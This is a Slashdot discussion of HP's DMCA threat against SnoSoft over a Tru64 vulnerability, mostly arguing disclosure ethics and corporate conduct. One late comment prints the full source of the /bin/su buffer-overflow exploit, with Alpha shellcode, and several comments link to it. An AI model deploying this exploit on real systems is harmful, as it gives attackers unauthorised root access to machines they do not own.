      I understand perfectly well that "thou shalt increase your stock price or face lawsuits," but I don't have to like it. It's a corruption of everything America, freedom, and true capitalism. I have every right to name it beast and call for it to be cast into the fires.

    7. Re:Bruce, it's time for you to make a decision by Bruce+Perens · · Score: 4, Informative
      I just heard of this for the first time, so give me some time to speak with the people involved.

      Bruce

    8. Re:Bruce, it's time for you to make a decision by rodgerd · · Score: 2

      Companies actually exist to fulfill their charter. Which may or may not make profit maximisation their primary goal (non-profits don't, for example).

Since the charter is granted solely at the discretion of society (as represented through government agencies), corporations ought to be careful about what they do...

    9. Re:Bruce, it's time for you to make a decision by elmegil · · Score: 5, Insightful
      Bruce,

I just want to say that I am 100% behind your request for time instead of having to answer to a horde of mad Slashdot zealots wielding pitchforks when you've had no time to investigate. Not all of us here are so quick to assume the worst.

Good luck in your discussions with the PHBs that be.

      --
      7 November 2006: The day Americans realized corruption and incompetence weren't addressing 11 September 2001
    10. Re:Bruce, it's time for you to make a decision by Jah-Wren+Ryel · · Score: 2

      This whole "deep pockets" excuse is just a lot of bullshit. "Deep Pockets" are for when some idiot gets drunk at work, falls off the loading dock and sues his employer for $2M. "Deep Pockets" are not about one multinational corp suing another multinational corp. In fact, such suits are what they do best.

      If HP had any gonads left after Carly's last couple of years, they would have stood up and told Bruce to go ahead and break the DMCA on company time so that their entire legal department could kick some ass instead of cowering in the corner.

      Of course the real reason they told Bruce to hold back wasn't any legal fears, they just are afraid of pissing off Hollywood and other potential customers. Morality doesn't mean beans when there is a buck to be made, even for the once honorable HP...

      --
      When information is power, privacy is freedom.
    11. Re:Bruce, it's time for you to make a decision by medcalf · · Score: 2

      Actually, it's not so much monopoly as the divine right of kings. Monopolies were originally granted by monarchs to exploit a given opportunity to the profit of the monopoly and the monarch without that pesky competition getting in the way. What now seems to be the case is that corporations in many cases want to grant themselves monopoly powers, by buying legislators to get the law amended in their favor. The amazing thing is that with all that is going on, we are not marching in the streets and exacting mob justice on the legislators and the corporations that buy them. Note that I am a fairly free-market capitalist, which is one of the reasons I am so angered when companies trash the system for their own short-term profit. True capitalism benefits everyone, not just the heads of corporations.

      --
      -- Two men say they're Jesus. One of them must be wrong. - Dire Straits
    12. Re:Bruce, it's time for you to make a decision by Malcontent · · Score: 2

You have to remember that most of the pro-business people on this board are MS employees. They automatically assume every business is run like MS. They presume that every corporation is as unethical as theirs. I guess they would have to assume that, otherwise they would lose a lot of sleep.

      --

      War is necrophilia.

    13. Re:Bruce, it's time for you to make a decision by Bruce+Perens · · Score: 3, Informative
      Well, my job is keeping the company from doing stuff that makes its customers want to "vote with their wallet" as you do, or fixing the problem when that goes wrong. Give me some chance to do it.

      Bruce

    14. Re:Bruce, it's time for you to make a decision by Bruce+Perens · · Score: 3, Informative
      One has to balance law and personal integrity. If things went down the way they were reported - and that's a big if - I would not really be able to stand by this, and would probably air some criticism of HP management. When I was hired, I did negotiate how and when I could criticize the company, and this falls within those parameters. Would I quit? Some people think I should stay around and try to teach them the right thing to do. Not that this would be easier than quitting. But HP isn't going away just because I slam the door on them.

      Bruce

    15. Re:Bruce, it's time for you to make a decision by Bruce+Perens · · Score: 2
      Well, did you see this line on the snosoft.com home page?
      Our advisory release policy is full disclosure unless bound by contract.

      I'm uncomfortable about that line. Thus, I'd better investigate both sides thoroughly.

      Bruce

    16. Re:Bruce, it's time for you to make a decision by Bruce+Perens · · Score: 4, Insightful
      Well, hopefully I get points for not speaking out of ignorance, which is what I would be doing if I were to air a condemnation before I had first-hand data.

      Thanks

      Bruce

    17. Re:Bruce, it's time for you to make a decision by drDugan · · Score: 2

      read my sig. 100% in agreement

    18. Re:Bruce, it's time for you to make a decision by Skapare · · Score: 2
      ... unless bound by contract.

      Sounds to me like they are soliciting to be "bought off".

      --
      now we need to go OSS in diesel cars
    19. Re:Bruce, it's time for you to make a decision by Lemmy+Caution · · Score: 2

      The question is whether your staying could be counterproductive by continuing to lend legitimacy and a form of sanction to their operation, or whether you could frankly do more good elsewhere. In many ways, your position is comparable to that of Colin Powell's in the Bush Administration, although you are actually a little freer than he is to directly express criticism.

    20. Re:Bruce, it's time for you to make a decision by crawling_chaos · · Score: 2
      hopefully I get points for not speaking out of ignorance

      Actually, in some way, that was what I was trying to say, while at the same time being pissed as hell about the profit uber alles attitude of the poster and the entire DMCA bullcrap. Actually, I did better than I usually do. When my emotional side and my intellectual side get into an argument, I usually end up eating a lot of shoe leather.

      At any rate, I await more news.

      --
      You can only drink 30 or 40 glasses of beer a day, no matter how rich you are.
      -- Colonel Adolphus Busch
    21. Re:Bruce, it's time for you to make a decision by Kaa · · Score: 2

      It used to be that people believed in ethics -- that there are societal responsibilities that compete with shareholder equity.

      The problem is that different people have different ethics.

See, the world isn't composed of affluent white-bread vaguely-Christian Americans. There is a whole bunch of other people around and they tend to have different, sometimes rather different, views.

You want corporations to be ethical? Act for morality reasons rather than for profit reasons? Fine, but don't be surprised if, say, a Saudi oil company would start massive funding of Islamic fundamentalists. It is morality, just not yours.

      --

      Kaa
      Kaa's Law: In any sufficiently large group of people most are idiots.
    22. Re:Bruce, it's time for you to make a decision by evbergen · · Score: 2

      Sadly, other than obeying the law, increasing the wealth of shareholders is the only thing companies can be actually held accountable for, because that's what we give them as their sole mission.

      Individual people may have ethics, but a corporation is something constructed to generate the maximum amount of wealth, given certain boundaries. That's what we in the western world, who seem to value money above freedom and power above peace, created corporations for.

      I'd say the situation is hopeless until our governments become real democracies again, acting on behalf of all people in the best interests of all people -- not just the people with the most money to spend on campaign donations, and not just short term monetary interests. Right now, western governments seem to have accepted the same charter as most corporations: generate the maximum amount of wealth, no matter what. Make Money Fast (TM). And of course, the best way to do it seems to help the existing corporations in every possible way, but certainly not to act against their interests.

Could it be that we are guilty of secretly allowing them to be ruled by the law of the corporate jungle, because we too have started to value the surrogate freedom provided by money above freedom of thinking, freedom of communication, and privacy of our own affairs? The illusion of security provided by an Orwellian state above the security provided by an even distribution of power in a democratic world?

But consider this though: the more power we transfer to corporations, the harder it will be to take it back into our own hands. At some point we'll need nothing less than a revolution to re-establish democracy: one man, one vote. Not one dollar, one vote.

      --
      All generalizations are false, including this one. (Mark Twain)
  10. C-Net news better look out! by piznut · · Score: 2, Interesting

Simply linking to the source code, like they are, could get them into trouble, could it not?

    http://deepmagic.securify.org.uk:8080/su.c

  11. DMCA and research by Col.+Klink+(retired) · · Score: 4, Insightful
    HP's dramatic warning appears to be the first time the DMCA has been invoked to stifle research related to computer security.
Um... wasn't that whole Felten/SDMI thing the first time the DMCA was invoked* to stifle research related to computer security?

    * Technically, they only threatened to invoke the DMCA. As of now, HP has also only threatened to invoke it.

    --

    -- Don't Tase me, bro!

    1. Re:DMCA and research by |<amikaze · · Score: 2

Hmmmm Adobe? Dmitry mean anything?

    2. Re:DMCA and research by LarsG · · Score: 2

wasn't that whole Felten/SDMI thing the first time the DMCA was invoked* to stifle research related to computer security?

      I must admit that I was not aware that the discovered weaknesses in audio watermarks enabled someone to gain root access on a server. ;-p

      --
      If J.K.R wrote Windows: Puteulanus fenestra mortalis!
    3. Re:DMCA and research by seanadams.com · · Score: 5, Insightful

      As of now, HP has also only threatened to invoke it.

Uh, no, "invoking the DMCA" is precisely what HP is doing, though they haven't formally filed a complaint with the feds. How can you possibly defend these unscrupulous fucks? From dictionary.com:

invoke
      tr.v. invoked, invoking, invokes
      ...
      2. To appeal to or cite in support or justification.
      ...
      5. To resort to; use or apply:
      ...

    4. Re:DMCA and research by Col.+Klink+(retired) · · Score: 2

      > How can you possibly defend...

Whoa! How can you say I'm defending them? I'm just saying they aren't the first "unscrupulous fucks". If they are "invoking" the DMCA by stating it in a threatening letter, they're still not the first. Felten got a letter that cited the DMCA too.

      My only point was that it was silly to claim that this is anything new.

      --

      -- Don't Tase me, bro!

    5. Re:DMCA and research by Col.+Klink+(retired) · · Score: 2
      I was not aware that the discovered weaknesses in audio watermarks enabled someone to gain root access on a server.

      But surely you were aware that removing a watermark is done to remove the security that the watermark was intended to impose and allow "unauthorized" access to it.

      Q. Who are you?

      We are a group of researchers studying computer security and digital watermarking.

      --

      -- Don't Tase me, bro!

    6. Re:DMCA and research by seanadams.com · · Score: 2

      I'm just saying they aren't the first "unscrupulous fucks".

      Okay, I may have taken your sentence a little out of context - sorry. But I stand by the rest of my statement.

    7. Re:DMCA and research by LarsG · · Score: 2

      But surely you were aware that removing a watermark is done to remove the security that the watermark was intended to impose

      Nay, a watermark does not impose any security. A watermark might be compared to a sign saying "thou shalt not trespass", but not to a lock.

      --
      If J.K.R wrote Windows: Puteulanus fenestra mortalis!
  12. Excerpt from the CNet article by zaren · · Score: 3, Interesting

    "On July 19, a researcher at SnoSoft posted a note to SecurityFocus.com's popular Bugtraq mailing list with a hyperlink to a computer program letting a Tru64 user gain full administrator privileges. The researcher, who goes by the alias "Phased," said in the message: "Here is the warez, nothing special, but it does the job." "

    Call me crazy, but if I were a mega-corporation, I wouldn't want someone releasing "warez" to break into my systems this way. If this was announced in a different way, like say a formal research group contacting the company privately with test results, instead of just some random person posting under an alias to an open list like BugTraq, things might be different.

    --
    Come to the University of Mars! Classes starting soon!
    1. Re:Excerpt from the CNet article by fishbowl · · Score: 2

I suppose you'd like an assassins' guild too, so that amateurs and people outside your sphere of influence don't commit murders? It doesn't work that way. Sorry.

      --
      -fb Everything not expressly forbidden is now mandatory.
    2. Re:Excerpt from the CNet article by m0rph3us0 · · Score: 4, Insightful

The article says they informed HP about these vulns a year earlier. In reality it is up to the company to secure their products; mistakes happen, but should Ralph Nader be put in jail for telling people that the Pinto's gas tank would explode on impact?

    3. Re:Excerpt from the CNet article by dnoyeb · · Score: 4, Interesting

Yes, HP could possibly assume the exploit is not totally public. As it stands, some random Joe posting an exploit says the exploit is mainstream by now...

    4. Re:Excerpt from the CNet article by Karma+Farmer · · Score: 5, Insightful

      Call me crazy, but if I were a mega-corporation, I wouldn't want someone releasing "warez" to break into my systems this way.

      No, of course you wouldn't like it. And, if you were an emperor who got suckered into walking around naked, you'd be fairly pissed at the kid who pointed out that you were, in fact, naked.

      But, this story has nothing to do with HP "liking" or "not liking" it when people (rightly) point out that they're walking around naked. The story is about the fact that the DMCA has emboldened HP to the point that they feel it's better to walk around naked and sue anyone who notices, rather than buying some reasonable clothes.

Etiquette in the security community demands that the discoverers of holes give companies reasonable time to respond to security problems before publicizing the security problems. But this courtesy is not, in any way, a courtesy towards the company that manufactures the flawed product. That company's opinion in the matter doesn't mean squat. It is a courtesy extended entirely to the users of the product. Users are harmed if they do not know about exploitable flaws in the products they use, but at the same time users are harmed if the exploitable flaws are widely known before patches are available. The only reasonable role for a company with flawed products in the security process is to work diligently to minimize the harm to users, by the only method available to them -- by expediting patches for their products, and thus providing an environment where the user can be informed of security flaws in their product as quickly as possible.

      Unfortunately, what HP has done here is imagine itself to have some other role in the security process -- someone at HP is under the completely mistaken impression that their opinion of the security process matters in any way. It does not. The courtesies of the security process are entirely towards the users of the flawed product. People have a right to know about flawed products. HP has the opportunity to provide patches to their product, so that those users might have some alternative to simply throwing all of their HP equipment in the garbage, but that is entirely HP's opportunity, and really of no concern either to the users or to the security professionals who disclose the hole.

    5. Re:Excerpt from the CNet article by sconeu · · Score: 2
      Actually, a year ago, one would have contacted Compaq about Tru64.

      --
      General Relativity: Space-time tells matter where to go; Matter tells space-time what shape to be.
    6. Re:Excerpt from the CNet article by mshiltonj · · Score: 2

      If this was announced in a different way, like say a formal research group contacting the company privately with test results, instead of just some random person posting under an alias to an open list like BugTraq, things might be different.

      Why? The exploit still exists.

13. hp wasting valuable energy by ecalkin · · Score: 4, Insightful

    this is really a shame. hp was one of the technology companies that had a lot going for it.

when you are fighting in a tough market *and* trying to make a merger happen without too much bad stuff, it seems that it is counter-productive to play this game: you make people mad, you spend resources (money and man-hours that could be easily used elsewhere) and you are *not* going to achieve the immediate goal of suppressing bad stuff (real or imagined).

    so hp gets more points in the bad pr column, they waste money, and the problem doesn't go away. i hope that they spin off the printer division before they crash and burn.

    eric

    p.s. i guess the worst part is that hp *didn't* learn from all the other companies that went down this path.

  14. bugtraq email by Anonymous Coward · · Score: 4, Informative
    Contents of the bugtraq email. Doing anon, fearful of prison buggery:


    got fed up of corporate bullshit
    here is the warez, nothing special, but it does the job :)
    note, this is just one of many many exploitable bofs in tru64 5.x
    http://deepmagic.securify.org.uk:8080/su.c
    phased
    phased@mail

  15. Very Frustrating by Anonymous Coward · · Score: 2, Insightful

    How are we to feel secure while computing if it is illegal to check up on the companies providing the software/hardware solutions?

    Imagine if you would, a secure piece of software ( or a secure piece of hardware ) is sold to handle monetary transactions, no-one can verify that the software/hardware is in fact secure ... except the criminals who are going to exploit the vulnerability and steal hard earned money.

    Yay for the DMCA for protecting corporations instead of the individual!

    my 2 cents.

  16. Dear HP by T3kno · · Score: 2

    I will never buy another one of your products, and I am seriously considering returning the ones that I have. I am in the position that has a great deal of spending power and 95% of the say as to what my company purchases, and I will never purchase an HP or Compaq product again. Thank you very much.

    Sincerely,

    A Former Customer.

    --
    (B) + (D) + (B) + (D) = (K) + (&)
    1. Re:Dear HP by T3kno · · Score: 2

      Actually, since I buy all of my equipment from resellers instead of directly from HP, I really have no idea how or who to contact there. I'm looking at their site right now for a mailing address, or an email address that is not a bitbucket. If you have any suggestions on who to contact let me know. I fully intend to send them a more thorough version of this letter along with numbers and a shiny picture of my ass.

      --
      (B) + (D) + (B) + (D) = (K) + (&)
  17. Re:Which Part of the DMCA? by dimator · · Score: 4, Funny

    The part that says "Thou shalt not give multi-billion dollar companies, who buy laws, a hard time."

    --
    python -c "x='python -c %sx=%s; print x%%(chr(34),repr(x),chr(34))%s'; print x%(chr(34),repr(x),chr(34))"
  18. Re:lets hope they do... by JoeBuck · · Score: 2

    Take it to court and maybe lose, even if any sane reading of the Bill of Rights suggests otherwise.

    Unfortunately, the courts are full of judges in their 60s with superstitious beliefs about computers and terror of hackers. The government lawyers will smear these guys up one side and down the other, exploiting every error they made, like calling their exploit "warez", a term commonly used for "stolen" code.

  19. In other news by m0rph3us0 · · Score: 4, Funny

    in other news today the FBI raids the offices of SnoSoft in search of DMCA prohibited cracking tools, they immediately seize compilers, source code, and felt markers.

  20. Security through [mrf! Grbbl--!] by KFury · · Score: 3, Insightful
    So is this a sign that Microsoft will once again(?) be a secure platform, because now in addition to:
    • Security through Obscurity
    and
    • Security through Diligence
    we now add the mighty
    • Security through Litigation?
    To be fair, when do the handgun designers go to jail again?
    1. Re:Security through [mrf! Grbbl--!] by dattaway · · Score: 2

      This is like Ford suing the Insurance Institute of America for rating a car low in side collision performance and publishing that fact.

      It's much worse than that. It's like Ford suing the mechanics for fixing the defective bumper on your Pinto that makes it blow up.

      HP is the King and you shalt not degrade His reputation.

  21. DMCA Violation? by _LFTL_ · · Score: 3, Insightful

    Ok someone fill me in here:

    How on earth does a law pertaining to the circumvention of copyright protection systems apply at all to someone releasing a security flaw in an operating system?

    1. Re:DMCA Violation? by fishbowl · · Score: 4, Insightful

      It does not. And if everyone involved has the guts to go ahead and let a jury decide, we might ALL be better off. Until someone does this, it's an open question whereby the mere threat of anything and everything is enough to control the behavior of individuals.

      --
      -fb Everything not expressly forbidden is now mandatory.
    2. Re:DMCA Violation? by buss_error · · Score: 4, Interesting
      And if everyone involved has the guts to go ahead and let a jury decide, we might ALL be better off.

      It is one thing for a MegaCorp to slam down a few million on litigation, it's another for me to pay to fight it. Am I really willing to go to the poor house over this issue? Am I really willing to throw away a fair job, an OK home, and my car?

      The problem in the US is that justice is bought and paid for. If you don't have the cash, you are part of the trash. Trash gets swept up. No, the only real effective course of action is to start bitching to office seekers and to stop paying for Intellectual Property. Swap CD's, swap DVD's, for God's sake read a book from the library. But don't shell out bucks for IP anymore. The profit they make is part of the club they are using against us.

      If no one purchased what Sony is selling, how long do you think Sony would stay in business? If we boycott RIAA members, how long would it be until Ms. Rosen had to go earn an honest living?

      Look, it's not a problem if you fall off the wagon. Just take the amount of money you spent on that CD, movie or DVD and send a like amount to the EFF.

      OK, so I'm a broken record.

      --
      Necessity is the plea for every infringement of human freedom. It is the argument of tyrants; it is the creed of slaves.
    3. Re:DMCA Violation? by inerte · · Score: 2, Insightful

      Am I really willing to go to the poor house over this issue? Am I really willing to throw away a fair job, an OK home, and my car?

      Okay, what if you don't? What if we resist peacefully the DMCA?

      What would happen if we allow everyone to be prosecuted? I bet that when the count comes to 150 person prosecuted, it will be over forever.

      I am close to the point of saying, let them come, and I am not even from the USA, but my country does mimic a lot of things that happen there (we also have a corrupt government, who doesn't?)

      While weighing the personal and monetary costs to resist these stupid laws, and letting my own sacrifice, I am slightly pending to the sacrifice side.

      It looks like doesn't matter how much we discuss, how much these things look and in effect, are stupid, how much they TRULY hold innovation, information, and ultimately knowledge (Middle Age's church, anyone?), nothing will change.

      It's apathetic to just discuss these things. Damn, if I were full of prejudice I could say that nerds are naturally more headed to talk and understand than most people.

      Imagine you walking to your grandma and saying to her: "Gran, if you look at this recipe, YOU WILL GO TO JAIL. If you decide to change the ingredients, YOU WILL GO TO JAIL. If you distribute the recipe to your friends, YOU WILL GO TO JAIL".

      Ha, the way things are, not even parables will suffice.

      Now, recipes are pretty cheap compared to source code, I know. One has aggregated value, and the other doesn't. But is this the society that we want to live?

      Hell no! It's not only information that I want, I NEED, and other people NEED too, that should be free.

      I don't know when the ranting will be over, hold on. Anyway, look at the future we are leaving to our children. This isn't good. This is good to a couple executives with their ass already so full of money that they can pretend that they give (or "donate") this money, because it will generate MORE to them! The corporative world is full of "social marketing" these days, and well, D'oh! Who believes that 99% of this crap is because suddenly companies want to go to heaven?

      No. It's acceptable to a point, isn't it? Have we come to the limit? Have we reached the suffering threshold that we allow ourselves to live in? Can we feel more deeply attacked on what we believe?

      Hell yes! We can! And that's the sad part. Slashdotters don't go to the street and make a DMCA riot because they (me too) are sweet little lazy bastards that think, hey, this one here isn't a big deal, this one here too. Oh, that one back in 1998 wasn't too, even if added with this one.

      I mean, we have the EFF to protect us, right? We have the power to decide about what the company we work will buy, right?

      WRONG! While all these gigantic bastards are spending millions on advertisement to talk about the "Digital Revolution", I say: What?

      Are you coming to tell me, someone who breathes computers 24/7, what is best to me in computer terms?

      Hell! Do the following if you work for a company that you DON'T like: Quit! If the company that you work makes deal with other companies that you think that will compromise your vision of the future, QUIT!

      Do you think that is it so hard to make a personal sacrifice to a better world?

      Blah, now I may resume my normal activities.

    4. Re:DMCA Violation? by rodgerd · · Score: 2
      What would happen if we allow everyone to be prosecuted? I bet that when the count comes to 150 person prosecuted, it will be over forever.
      The US have imprisoned literally millions of people in the "drug war", many of whom have committed the sin of smoking dried plant leaves because they like the way it makes them feel 20 IQ points dumber. The fact that this has not retarded drug use and has made drug barons fantastically rich hasn't altered the determination of the US government to put people in jail (and a whole bunch more).

      The idea that jailing a few hundred people for DMCA violations would make lawmakers think twice is fanciful.
  22. DL & P2P it by gearheadsmp · · Score: 2, Interesting
  23. Wonder if anyone could countersue? by fishbowl · · Score: 2

    A big customer could claim this damages their ability to operate and sue HP for suppressing information, the absence of which could lead to increased vulnerabilities in their systems.

    It's too bad that people have egos, also, because if things like hard crypto implementations, security information, and so on were simply released anonymously into various outlets (e.g., not just the net), there would be nobody to sue.

    In this case I think there won't be anybody to sue either -- the individual who made the report might not be subject to US law.

    Take this to its logical conclusion, and realize that computer systems in the USA will tend to be less secure than their counterparts in free countries that do not suppress information exchange. I wish it were simpler to relocate to Europe; it sure as hell appears to be easy for them to relocate to the USA.

    --
    -fb Everything not expressly forbidden is now mandatory.
  24. Ridiculous by dh003i · · Score: 5, Insightful

    The public has the right to know about these security flaws, just as much as we have the right to know if the tires we buy pass safety standards.

    HP trying to cover this up just proves it's a problem. HP is using the DMCA to prevent people from discussing valid flaws in their OSes.

    People have the right to know if the car they're driving -- or are going to buy -- is unsafe. Why? Because their lives depend on it, literally. For the same reason, people have the right to know if the OS they're using is secure. Why? Because their lives depend on it, or at least their careers. Data important to one's career (i.e., scientific experimental data) is stored on one's computer. Private information -- i.e., credit card information -- is stored on a computer. Security holes can literally destroy one's life.

    We have the right to know exactly what problems there are in our software.

    1. Re:Ridiculous by metacosm · · Score: 2

      Why isn't this common sense is my question. This is such a basic concept. Do we create locks and make it a crime for even the home owner to test them?

      This issue has reached silly levels, and there is no one willing to step up and point out how stupid it is. It is a frustrating day.

    2. Re:Ridiculous by Danse · · Score: 2

      Exactly, and if I found a problem and notified MasterLock and they didn't care, and then I go to the local news channel and they air a piece about it, would they be sued? I doubt it. I think this kind of crap has got to stop and the law that makes it possible has got to go.

      --
      It's not enough to bash in heads, you've got to bash in minds. - Captain Hammer
    3. Re:Ridiculous by dh003i · · Score: 2

      So, if a car company sells you a car with a contract that endangers you, that's legit? This is like saying Ford can sell you a car but deny you the right to notify others of problems with it. It's invalid.

  25. Be thankful... by natefaerber · · Score: 2, Funny

    The DMCA just made this world a safer place.

    Don't ask, don't tell.

    --
    -- My HARDWARE, My CHOICE.
  26. as a Tru64 admin... by Corgha · · Score: 4, Interesting

    This is just another reason to say "fuck you, the new HP" and run faster to Linux and *BSD. Admittedly, anyone who has recently had to compare the price of an ES40 and an equivalent amount of Intel-compatible compute is probably already heading there...

    Still, this sort of head-in-the-sand response to security vulnerabilities is not a good way to make happy customers. Obviously, the exploit exists; what HP apparently wants to do is make sure that it only gets passed around on IRC so that admins can get completely blindsided.

    Of course, Compaq already killed the Alpha, and don't get me started on their support contracts (OK, so they inherited those). It's almost as if they don't want customers (well, DigitalUNIX/Tru64 customers probably *are* a bit of a pain in the ass, compared to MCSEs).

    It's just sad to see the last bits of the carcass of what was once a pretty cool company (DEC) get so abused.

    1. Re:as a Tru64 admin... by Corgha · · Score: 2

      ...you have probably tested the code?

      Whether the exploit works or not is really irrelevant to me. It's HP's reaction that has me ticked.

      Let us suppose that the exploit is a hoax. The proper reaction, IMHO, would be to demonstrate that the vulnerability does not work. The fact that they are threatening legal action indicates two things: They see

  27. Re:Bruce is 2 faced, so expect him by Anonymous Coward · · Score: 2, Funny

    Theo... is that you?

  28. Tell HP's CEO what you think! by Arcturax · · Score: 5, Informative

    Email their president and CEO from this page!

    Tell her in NICE non flaming tones why you feel what they are doing is wrong. Explain that this kind of action makes you unwilling to buy any more products from them.

    --

    --Won't that be grand? Computers and the programs will start thinking and the people will stop. - Dr. Walter Gibbs
    1. Re:Tell HP's CEO what you think! by Anonymous Coward · · Score: 4, Funny

      Dear Ms. Fiorina,

      I just read about your company's threat of action under the DMCA against a security researcher who released exploit information about your Tru64 Unix product. As a software engineer working for a large competitor of yours, I'd like to thank you for your actions. The well-earned reputation for security and reliability of our product can only be enhanced by ill-mannered attempts at suppressing information from your company. Any further help you can provide in assuring my future job security in this uncertain economy will be greatly appreciated.

    2. Re:Tell HP's CEO what you think! by LWolenczak · · Score: 2

      Dear Whoever gets this email,

      I find it interesting that HP has decided to go after a security analyst who found a bug in tru64, using the DMCA, which does not apply and virtually threatening him with a half million liability lawsuit under that law. Vulnerability information should be known by all. HP is clearly making its reputation look very bad with this action. Soon, if you continue, I'm sure it will end up just like the DVD CCA fiasco. It's just that HP clearly has no case. Any reasonable judge would see HP's actions as a threat. This reeks, it reminds me of some other large companies that are being investigated by the SEC or who have had to file for chapter 11.

      Good Day.

    3. Re:Tell HP's CEO what you think! by Arcturax · · Score: 2

      Replying to my own post is silly, but here is mine.

      Dear Ms. Fiorina,

      I read on Slashdot.org that your company is suing a group of security experts for pointing out a flaw in your Tru64 UNIX operating system and warning others about it via SecurityFocus.com. As a buffer overflow is a rather trivial thing to fix, and you've apparently known about it for a while, I wonder why your programming team did not simply fix the bug and release a patch? That would certainly make a lot more sense than expensive lawyers and damaging your corporate image by using the DMCA as a censorship tool.

      I will add that where I work, we have purchased several HP Unix machines and seeing this kind of reaction to a security hole instead of fixing it and thanking SnoSoft for pointing it out concerns me greatly. We don't use Tru64, but if this is how you deal with security holes in your products, ignoring it and trying to cover it rather than fixing it, it doesn't make companies, small or large very keen on continuing to purchase your hardware or software.

      So I urge you to put pressure on those in your company who need it to retract their claim against SnoSoft, instruct your programmers to fix the hole and release a patch, and finally, apologize to those your company has threatened to sue under the DMCA for simply doing their jobs, which is to audit software and warn others about security problems they should know about.

      Sincerely,

      --

      --Won't that be grand? Computers and the programs will start thinking and the people will stop. - Dr. Walter Gibbs
  29. So This is the, "New HP?" by ewhac · · Score: 4, Interesting

    HP Classic would never have pulled a stunt like this. They would have gone, "Oops, my bad, here's a bugfix everyone."

    As time goes on, it looks more and more as if Walter Hewlett and David Packard were right: This whole "New HP" thing is just so much hogwash.

    Schwab

  30. Quoting Gus from TrippingTheRift... by leonbrooks · · Score: 2

    `Oh, now _this_ is fair!'

    --
    Got time? Spend some of it coding or testing
  31. Babelfish Translation by shokk · · Score: 5, Funny

    For those of you who are HPaq-ese impaired, here is the message:

    Dear HPaq customers,
    We thank you for having purchased our products in the past, but now that we have finalized our merger and cashed our options, we have lost our minds and come to the boggling conclusion that we don't want your money anymore. Please do not buy our products because honestly you can't trust us to inform you when there is a defect with our product. This includes any servers, and handhelds our merger partner might peddle, printers, or whatever the hell it is these people do. As a sign of our gratitude for your service, we will be providing each future customer with a free Berber mousepad under which you can sweep any problems you discover. If you believe the problem doesn't exist, and we believe the problem doesn't exist, then we can work together to warp reality and drive customers away like poor starving slobs on the street corner to a free luncheon. Personally, I don't recommend you use these things in anything that might risk a human life or attempt to improve society in any way. Heck, I wouldn't run my porn servers on this crap. Well, gotta run, my coke dealer is here. And don't forget to F off!

    P.S. - Don't unravel the mousepad to see how it's made or we'll sue your ass into orbit under the DMCA.

    --
    "Beware of he who would deny you access to information, for in his heart, he dreams himself your master."
  32. In case anyone wants it... by User+956 · · Score: 2, Informative
    --
    The theory of relativity doesn't work right in Arkansas.
  33. Great - Let this be our poster child by jfrumkin · · Score: 2

    What a perfect example - a really easy to demonstrate abuse that the DMCA allows. Hell, I could show this case to my non-techie relatives, and they'd understand just how wrong it is. Go HP - this type of bullying helps more than 10 highly paid lobbyists.

    --

    "What we have here, is a failure to communicate." - Cool Hand Luke
  34. Re:let me see if I get this right by xigxag · · Score: 3, Interesting

    HP should be thanking them

    This is a bad thing for HP. The thing is, hackers love to share their code with the world. And there are two ways to exploit that obsessive desire, either through good (white hat) mechanisms or through bad (cracker) mechanisms. If HP prevents hackers from researching exploits in a legitimate fashion, it won't stop the hackers -- they'll just only leak their hacks onto Eastern European warez websites outside of the reach of US law. HP won't be aware of anything until it's too late and millions of dollars of damage have already been done by malicious parties. It's like that old saw about gun ownership: When hacking software is a crime then only criminals will hack your software.

    --
    There are two kinds of people: 1) those who start arrays with one and 1) those who start them with zero.
  35. news.com.com also vulnerable by sparkz · · Score: 2
    Their article also supplies the link in their article ... and so does Slashdot, now ... Sue them all?

    Why not just all mirror this code, let HP figure that one out...

    --
    Author, Shell Scripting : Expert Re
  36. Re:Don't blame HP by Quixote · · Score: 3, Insightful
    Some people seem to forget that the real villain here is the US Government, who made DMCA into law.

    Yep. Murderers don't kill people; guns do! Don't send the murderers to jail; go after the gun manufacturers.

    The USC made a stupid law; just because a stupid law exists it does not mean that it should be used to quash legitimate research. If Carly had half a brain, she would fire the idiot VP and apologize to Snosoft. But don't count on it happening anytime soon.

  37. Do you mean this source code? by User+956 · · Score: 4, Interesting

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    /* Alpha shellcode: 29 four-byte instructions. Two groups in the post read
       "xff..." and "x30..." with the backslash dropped (assumed to be a
       transcription error); they are restored here. */
    char shellcode[] =
        "\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2"
        "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22"
        "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47" "\x11\x14\xe3\x43"
        "\x20\x35\x20\x42" "\xff\xff\xff\xff" "\x30\x15\xd9\x43" "\x31\x15\xd8\x43"
        "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26"
        "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26"
        "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42"
        "\xff\xff\xff\xff";

    int main(int argc, char *argv[])
    {
        int i, j;
        char buffer[8239];    /* argv[1]: 8233 bytes of padding, then 5 address bytes */
        char payload[15200];  /* argv[2]: NOP sled, then the shellcode */
        char nop[] = "\x1f\x04\xff\x47";  /* Alpha NOP: bis $31,$31,$31 */

        memset(buffer, 0, sizeof buffer);
        memset(payload, 0, sizeof payload);
        for (i = 0; i < 8233; i++)
            buffer[i] = 0x41;   /* 'A' padding */
        buffer[i++] = 0x01; buffer[i++] = 0x04;  /* bytes written over the */
        buffer[i++] = 0x01; buffer[i++] = 0x40;  /* saved address, in memory order */
        buffer[i++] = 0x01;

        for (i = 0; i < 15000; )           /* 3750 NOPs */
            for (j = 0; j < 4; j++)
                payload[i++] = nop[j];
        for (j = 0; j < (int)sizeof(shellcode); i++, j++)
            payload[i] = shellcode[j];     /* copies the terminating NUL too */

        printf("/bin/su by phased\n");
        printf("payload %db\n", (int)strlen(payload));
        printf("buffer %db\n", (int)strlen(buffer));
        execl("/usr/bin/su", "su", buffer, payload, (char *)0);
        return 1;   /* only reached if execl() fails */
    }

    --
    The theory of relativity doesn't work right in Arkansas.
    1. Re:Do you mean this source code? by Wrexen · · Score: 3, Funny

      I think the truly impressive part of this code is getting past the lameness filter... that's gotta be against some law

